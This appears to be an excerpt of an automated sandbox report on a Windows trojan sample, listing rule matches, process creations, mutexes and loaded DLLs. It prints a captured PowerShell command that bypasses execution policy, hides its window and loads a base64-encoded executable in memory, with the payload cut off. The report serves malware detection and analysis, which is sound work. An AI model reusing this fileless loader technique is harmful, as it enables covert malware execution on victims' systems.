        Source: C:\Windows\System32\notepad.exeWindows user hook set: 0 mouse C:\Windows\System32\SHELL32.dll

        System Summary

        barindex
        Source: 0000000F.00000002.1735219264.000001FA636A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 00000010.00000002.2420233433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 20675
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 20675
        Source: 0000000F.00000002.1735219264.000001FA636A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 00000010.00000002.2420233433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: classification engineClassification label: mal96.troj.evad.winTXT@8/5@3/20
        Source: C:\Windows\System32\notepad.exeFile created: C:\Users\user\Desktop\bad.cmd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: NULL
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_helptomybrodox2025
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fowi0k3f.r2i.ps1
        Source: C:\Windows\System32\notepad.exeFile read: C:\Users\desktop.ini
        Source: C:\Windows\System32\notepad.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\bad.txt
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\bad.cmd"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: dui70.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: duser.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: explorerframe.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: windowscodecs.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: thumbcache.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: dataexchange.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: d3d11.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: dcomp.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: msftedit.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: windows.globalization.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: bcp47mrm.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: globinputhost.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: structuredquery.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: atlthunk.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.search.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: linkinfo.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: ehstorshell.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: cscui.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: networkexplorer.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: ntshrui.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: cscapi.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: winmm.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: windows.staterepositorycore.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: windows.ui.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: windowmanagementapi.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: inputhost.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: provsvc.dll
        Source: C:\Windows\System32\notepad.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dll
